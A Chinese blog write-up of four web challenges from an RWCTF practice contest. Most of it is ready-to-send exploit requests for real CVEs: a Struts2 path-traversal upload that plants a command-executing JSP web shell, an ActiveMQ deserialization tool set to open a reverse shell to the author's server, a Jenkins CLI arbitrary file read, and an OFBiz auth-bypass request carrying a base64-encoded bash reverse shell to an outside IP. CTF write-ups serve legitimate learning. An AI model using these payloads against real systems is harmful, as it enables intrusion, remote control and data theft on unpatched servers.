首页 > 其他分享 >RWCTF体验赛-WEB部分

RWCTF体验赛-WEB部分

时间:2024-01-28 10:33:18浏览次数:26  
标签:xml WEB zh Accept Content application 体验 CVE RWCTF

RWCTF体验赛-WEB部分

Be-More-Elegant

S2-066—Apache Struts2 文件上传漏洞(CVE-2023-50164)

漏洞原理就算利用大小写和解析顺序来绕过过滤器,实现目录穿越的任意文件上传

POST /upload.action HTTP/1.1
Host: 47.99.57.31:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------397107011528970757432973128771
Content-Length: 768
Origin: http://47.99.57.31:8080
Connection: close
Referer: http://47.99.57.31:8080/
Cookie: JSESSIONID=39924630AA26CB97CB6C858419F00B6E
Upgrade-Insecure-Requests: 1

-----------------------------397107011528970757432973128771
Content-Disposition: form-data; name="FileUpload"; filename="1.txt"
Content-Type: text/plain

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
-----------------------------397107011528970757432973128771
Content-Disposition: form-data; name="fileUploadFileName";
Content-Type: text/plain

../../../views/2.jsp
-----------------------------397107011528970757432973128771--

将FileUpload开头首字母大写,然后构造如上数据包,即可实现目录穿越

访问http://47.99.57.31:8080/views/2.jsp?pwd=023&i=/readflag即可回显flag

Be-an-ActiveMq-Hacker

CVE-2023-46604

上工具直接秒

https://github.com/evkl1d/CVE-2023-46604

将里面poc.xml中改成反弹自己vps,然后放到自己的vps上

接着运行:

python exploit.py -i ip -p port -u http://vps:port/poc.xml

即可弹shell

Be-a-Security-Researcher

[CVE-2024-23897]Jenkins CLI 任意文件读取漏洞

还是工具直接秒

https://forum.butian.net/share/2752

java -jar jenkins-cli.jar -s http://47.96.171.129:8080/ who-am-i @/flag

即可得到flag

Be-a-Framework-Hacker

Apache OFBiz 未授权远程代码执行(CVE-2023-51467)

构造如下数据包:

POST /webtools/control/ProgramExport?USERNAME=aa&PASSWORD=aa&requirePasswordChange=Y HTTP/2
Host: 127.0.0.1:8443
Cookie: OFBiz.Visitor=10001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

groovyProgram=["/bin/bash","-c","echo+'YmFzaCAtaSA%2bJiAvZGV2L3RjcC80My4xNDMuMjAzLjE2Ni8yMzMzIDA%2bJjE='|base64+-d|bash"].execute()

注意将host改为127.0.0.1

发包即可弹shell:

标签:xml,WEB,zh,Accept,Content,application,体验,CVE,RWCTF
From: https://www.cnblogs.com/gxngxngxn/p/17992517

相关文章

  • .net core8 knife4 web api文档
    knife4官网:https://github.com/luoyunchong/IGeekFan.AspNetCore.Knife4jUI1.创建.netcore8webapi项目2.nuget包管理添加如下包:Swashbuckle.AspNetCore.SwaggerSwashbuckle.AspNetCore.SwaggerGenIGeekFan.AspNetCore.Knife4jUI  3.在项目右键-属性-生成-......
  • 2、【实操】dash库设计web界面对mysql数据进行展示
    dash+mysql的简单应用python库简介:  dash:web界面的UI设计;  pymysql:MySQL数据库连接、操作引擎pandas:使用read.sql("sql",mysql_connection)函数将msyql的表单数据转换成DataFrame格式 第一步:  实现对MySQL数据库的连接,并对表单的数据进行展示    ......
  • Burp Suite Professional 2024.1.1 (macOS, Linux, Windows) - Web 应用安全、测试和
    BurpSuiteProfessional2024.1.1(macOS,Linux,Windows)-Web应用安全、测试和扫描BurpSuiteProfessional,Test,find,andexploitvulnerabilities.请访问原文链接:https://sysin.org/blog/burp-suite-pro/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgB......
  • 用户体验可观测性之-long task初认识
    本文只讨论跟longtask相关内容,自我学习。defLongTask isanewperformancemetricAPIthatcanbeusedformeasuringtheresponsivenessofanapplicationandhelpsdeveloperstounderstandthebaduserexperienceonthewebsite.ItenablesdetectingCPUintens......
  • windowForm程序的webView2错误 System.IO.FileNotFoundException: 系统找不到指定的文
    最近开发公司的一个项目,要求打包在windows中执行的exe可执行文件开始我想到的是使用windowsForm里面webView嵌套网页执行,vs自带提供的WebBrowser的内核是ie7的,兼容性确实不好,后面使用Microsoft.Web.WebView2(通过NuGet安装)兼容性问题解决了。在我的电脑上可以完整的运行,但是在同......
  • 转 | 我是一名前端,部门想让我转webgl方向,要不要考虑一下?
    https://www.zhihu.com/question/640467378/answers/updated 作者:Medy丶ghost链接:https://www.zhihu.com/question/640467378/answer/3372989459来源:知乎著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。说一个大部分前端无法接受的事实。90%的前端搞不......
  • WebGL之三维正射投影(高级)
    一,前言1,绘制一个正方体的数据,我们以前,上,右逆时针绘制,对面的用顺时针绘制。  2,数据准备cubeModel.js/***获得正方体所有顶点位置*@paramsideLength边长*/window.getCubeVertexesPosition=(sideLength)=>{//前constFRONT=[0.0,0.0,0.0......
  • 使用 Asp.net core webapi 集成配置系统,提高程序的灵活和可维护性
    前言:什么是集成配置系统?集成配置系统的主要目的是将应用程序的配置信息与代码分离,使得配置信息可以在不需要修改代码的情况下进行更改。这样可以提高应用程序的灵活性和可维护性。ASP.NETCore提供了一种灵活的配置系统,可以轻松地将配置信息从不同的来源加载到应用程序中,并且......
  • 4千元高端热水袋不能装沸水?物联网技术革新智能热水袋取暖体验
    近日,Burberry品牌的一款售价高达4400元的热水袋因不建议灌注沸水而引发热议。不少网友感到惊讶与困惑,4千多块真是买了个寂寞,毕竟这个价格能买到取暖器了!但从另一个角度来看,这恰好揭示了当前及未来智能家居领域对热水袋产品安全性和智能化提升的迫切需求。4400元的高端热水袋不能装......
  • [西湖论剑 2022]web部分题解(更新中ing
    [西湖论剑2022]NodeMagicalLogin环境!启动!(ノへ ̄、)这么一看好像弱口令啊,(不过西湖论剑题目怎么会这么简单,当时真的傻),那就bp抓包试一下(这里就不展示了,因为是展示自己思路,这里就写了一下当时的NC思路,其实是不对的┭┮﹏┭┮)不是BP弱口令?那好吧,我们先看一下源码,比赛的时候是给了源......